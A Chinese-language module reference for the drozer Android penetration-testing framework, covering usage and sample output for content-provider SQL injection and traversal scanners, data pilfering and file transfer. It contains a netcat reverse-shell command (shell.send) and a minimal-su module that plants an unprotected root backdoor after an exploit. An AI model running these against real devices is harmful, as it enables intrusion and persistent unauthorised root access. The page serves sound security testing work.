目錄
模塊列表
模塊 | 作用 |
---|---|
auxiliary.webcontentresolver | 開啓web服務來獲取content providers |
exploit.jdwp.check | 針對@jdwp-control漏洞 |
exploit.pilfer.general.apnprovider | 獲取APN信息 |
exploit.pilfer.general.settingsprovider | 查看系統設置 |
information.datetime | 查看設備時間 |
information.deviceinfo | 獲取設備詳細信息 |
information.permissions | 列出所有手機應用使用過的權限信息 |
scanner.activity.browsable | 獲取可以從瀏覽器查看的activity |
scanner.misc.native | 列出包含native的包 |
scanner.misc.readablefiles | 查找可被其應用讀取的文件 |
scanner.misc.secretcodes | 查找手機暗碼 |
scanner.misc.writablefiles | 查找能被其他應用寫數據權限的文件 |
scanner.provider.finduris | 查找content providers URI鏈接 |
scanner.provider.injection | 查找content providers SQL注入 |
scanner.provider.sqltables | 通過SQL注入查找表名 |
scanner.provider.traversal | 查找目錄遍歷漏洞 |
shell.exec | 執行單條shell命令 |
shell.send | 發送ASH shell到遠程監聽器 |
shell.start | 進入shell模式 |
tools.file.download | 下載手機上的文件 |
tools.file.md5sum | 獲取文件的md5 |
tools.file.size | 獲取文件大小 |
tools.file.upload | 從PC上傳文件到設備 |
tools.setup.busybox | 安裝Busybox |
tools.setup.minimalsu | 安裝minimal-su |
auxiliary.webcontentresolver
usage: run auxiliary.webcontentresolver [-h] [-p PORT]
開啓一個web服務,可以和手機上的content provider連接,還可以和sqlmap聯合使用。
Examples:
dz> run auxiliary.webcontentresolver –port 8080
WebContentResolver started on port 8080.
Ctrl+C to Stop
Last Modified: 2012-11-06
Credit: Nils (@mwrlabs)
License: BSD (3 clause)
optional arguments:
模塊 | 作用 |
---|---|
-p PORT, –port PORT | 設置web端口 |
exploit.jdwp.check
usage: run exploit.jdwp.check [-h]
這個模塊針對一個漏洞,安卓2.3版本可調試的app都會去尋找一個叫@jdwp-control的UNIX套接字。
Examples:
dz> run exploit.jdwp.check
[+] Opened @jdwp-control
[*] Accepting connections
[+] com.mwr.dz connected!
[+] Received PID = 4931
[+] This device is vulnerable!
[+] com.mwr.dz connected!
[+] Received PID = 4940
[+] This device is vulnerable!
Last Modified: 2014-07-29
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, –help
exploit.pilfer.general.apnprovider
usage: run exploit.pilfer.general.apnprovider [-h]
獲取APN信息, APN,全寫是Access Point Name,即“接入點名稱”,是您在通過手機上網時必須配置的一個參數,它決定了您的手機通過哪種接入方式來訪問網絡。
The target provider is content://telephony/carriers/preferapn
Examples:
dz> run exploit.pilfer.general.apnprovider
_id 1
name T-Mobile US
numeric 310260
mcc 310
mnc 260
apn epc.tmobile.com
… …
Last Modified: 2012-11-06
Credit: Rob (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, –help
exploit.pilfer.general.settingsprovider
usage: run exploit.pilfer.general.settingsprovider [-h]
查看系統設置
Last Modified: 2012-11-06
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, –help
information.datetime
usage: run information.datetime [-h]
查看安卓設備的時間
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, –help
information.deviceinfo
usage: run information.deviceinfo [-h]
獲取設備詳細信息
Last Modified: 2012-11-06
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, –help
information.permissions
usage: run information.permissions [-h] [–permission PERMISSION] [–protectionlevel PROTECTIONLEVEL]
列出所有手機應用使用過的權限信息。
Examples:
dz> run information.permissions –permission android.permission.INSTALL_PACKAGES
Allows the app to install new or updated Android packages. Malicious apps may use this to add new apps with arbitrarily
powerful permissions.
18 - signature|system
Last Modified: 2014-06-17
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)
optional arguments:
模塊 | 作用 |
---|---|
–permission PERMISSION | 指定權限 |
–protectionlevel PROTECTIONLEVEL | 指定保護等級 |
scanner.activity.browsable
usage: run scanner.activity.browsable [-a] [–package PACKAGE ][-f] [–filter FILTER ]
找出所有可瀏覽的activity
Package: com.android.contacts
Invocable URIs:
tel://
Classes:
.activities.PeopleActivity
com.android.contacts.NonPhoneActivity
Package: com.android.calendar
Invocable URIs:
http://www.google.com/calendar/event (PATTERN_PREFIX)
Classes:
GoogleCalendarUriIntentFilter
Package: com.android.browser
Invocable URIs:
http://
Classes:
BrowserActivity
Package: com.android.music
Invocable URIs:
http://
content://
Classes:
AudioPreview
Package: com.android.mms
Invocable URIs:
sms://
mms://
Classes:
.ui.ComposeMessageActivity
Last Modified: 2014-10-31
Credit: Tyrone (@mwrlabs)
License: BSD (3-clause)
optional arguments:
模塊 | 作用 |
---|---|
-a PACKAGE, –package PACKAGE | 指定包名 |
-f FILTER, –filter FILTER | 指定關鍵詞 |
scanner.misc.native
usage: run scanner.misc.native [-h] [-a PACKAGE] [-f FILTER] [-v]
列出包含native的包
注意: 只檢查包捆綁的lib文件來判斷
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
optional arguments:
模塊 | 作用 |
---|---|
-a PACKAGE, –package PACKAGE | 指定包名 |
-f FILTER, –filter FILTER | 指定關鍵詞 |
-v, –verbose | 顯示未包含的包 |
scanner.misc.readablefiles
usage: run scanner.misc.readablefiles [-h] [-p] target
查找可被其應用讀取的文件
Examples:
dz> run scanner.misc.readablefiles /data -p
Discovered world-readable files in /data:
/data/system/packages-stopped.xml
/data/system/packages.list
/data/system/packages.xml
/data/system/uiderrors.txt
……
Last Modified: 2013-04-18
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
positional arguments:
target the target directory to search
optional arguments:
模塊 | 作用 |
---|---|
-p, –privileged | 有root權限 |
scanner.misc.secretcodes
usage: run scanner.misc.secretcodes [-h] [-v]
查找手機暗碼,具體參考:
http://blog.csdn.net/huangjuecheng/article/details/7261211?spm=5176.100239.blogcont61513.10.a86Q5r
Last Modified: 2012-11-06
Credit: Mike (@mwrlabs)
License: BSD (3 clause)
optional arguments:
模塊 | 作用 |
---|---|
-v, –verbose | 顯示詳細信息 |
scanner.misc.writablefiles
usage: run scanner.misc.writablefiles [-h] [-p] target
查找能被其他應用寫數據權限的文件
Examples:
dz> run scanner.misc.writablefiles /data –privileged
Discovered world-writable files in /data:
/data/anr/slow00.txt
/data/anr/slow01.txt
……
Last Modified: 2013-04-18
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
positional arguments:
target the target directory to search
optional arguments:
模塊 | 作用 |
---|---|
-v, –verbose | 顯示詳細信息 |
scanner.provider.finduris
usage: run scanner.provider.finduris [-h] [-a PACKAGE]
查找content providers URI鏈接
Examples:
run scanner.provider.finduris
Last Modified: 2012-11-06
Credit: Luander ([email protected])
License: BSD (3 clause)
optional arguments:
模塊 | 作用 |
---|---|
-a PACKAGE, –package PACKAGE | 指定包名 |
scanner.provider.injection
usage: run scanner.provider.injection [-h] [-a ]
查找SQL注入
Last Modified: 2012-11-06
Credit: Rob (@mwrlabs)
License: BSD (3 clause)
optional arguments:
模塊 | 作用 |
---|---|
-a , –package , –uri | 指定包名或者uri |
scanner.provider.sqltables
usage: run scanner.provider.sqltables [-h] [-a ]
Enumerate SQL tables accessible through SQL (projection) Injection vulnerabilities.
Last Modified: 2013-01-23
Credit: Rijnard
License: BSD (3 clause)
optional arguments:
模塊 | 作用 |
---|---|
-a , –package , –uri | 指定包名或者uri |
scanner.provider.traversal
usage: run scanner.provider.traversal [-h] [-a ]
查找目錄遍歷漏洞
Last Modified: 2012-11-06
Credit: Nils (@mwrlabs)
License: BSD (3 clause)
optional arguments:
模塊 | 作用 |
---|---|
-a , –package , –uri | 指定包名或者uri |
shell.exec
usage: run shell.exec [-h] command
執行單條shell命令
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
positional arguments:
command the Linux command to execute
optional arguments:
-h, –help
shell.send
usage: run shell.send [-h] ip port
發送ASH shell到遠程監聽器
This module executes nc IP PORT -e ash -i
, using BusyBox. This will send an ASH shell to a netcat listener.
Last Modified: 2013-07-25
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)
positional arguments:
ip ip address of the remote listener
port port address of the remote listener
optional arguments:
-h, –help
shell.start
usage: run shell.start [-h]
進入shell模式
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, –help
tools.file.download
usage: run tools.file.download [-h] source destination
從手機設備下載文件到pc
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
positional arguments:
source
destination
optional arguments:
-h, –help
tools.file.md5sum
usage: run tools.file.md5sum [-h] target
md5 Checksum of File
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
positional arguments:
target
optional arguments:
-h, –help
tools.file.size
usage: run tools.file.size [-h] target
獲取文件大小
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
positional arguments:
target
optional arguments:
-h, –help
tools.file.upload
usage: run tools.file.upload [-h] source destination
從PC上傳文件到設備
Last Modified: 2012-11-06
Credit: MWR InfoSecurity (@mwrlabs)
License: BSD (3 clause)
positional arguments:
source
destination
optional arguments:
-h, –help
tools.setup.busybox
usage: run tools.setup.busybox [-h]
安裝Busybox
Busybox provides a number of *nix utilities that are missing from Android. Some modules require Busybox to be installed.
Typically, you require root access to the device to install Busybox. drozer can install it from its restrictive context. You can
then use ‘busybox’ in the when executing shell commands from drozer to use it.
Last Modified: 2012-12-12
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, –help
tools.setup.minimalsu
usage: run tools.setup.minimalsu [-h]
Prepares ‘minimal-su’ binary installation files on the device in order to provide access to a root shell on demand.
安裝minimal來可以獲取暫時的root權限
This binary provides drozer the ability to maintain access to a root shell on the device after obtaining a temporary root shell
via the use of an exploit. Just type su
from a shell to get a root shell.
WARNING: This minimal version of the su binary is completely unprotected, meaning that any application on the device can obtain a
root shell without any user prompting.
Examples:
dz> run tools.setup.minimalsu
[*] Uploaded minimal-su
[*] Uploaded install-minimal-su.sh
[*] chmod 770 /data/data/com.mwr.dz/install-minimal-su.sh
[*] Ready! Execute /data/data/com.mwr.dz/install-minimal-su.sh from root context to install su
…insert root exploit here…
u0_a95@android:/data/data/com.mwr.dz # /data/data/com.mwr.dz/install-minimal-su.sh
Done. You can now use su
from a shell.
u0_a95@android:/data/data/com.mwr.dz # exit
u0_a95@android:/data/data/com.mwr.dz $ su
u0_a95@android:/data/data/com.mwr.dz #
Last Modified: 2013-12-12
Credit: Tyrone (@mwrlabs)
License: BSD (3 clause)
optional arguments:
-h, –help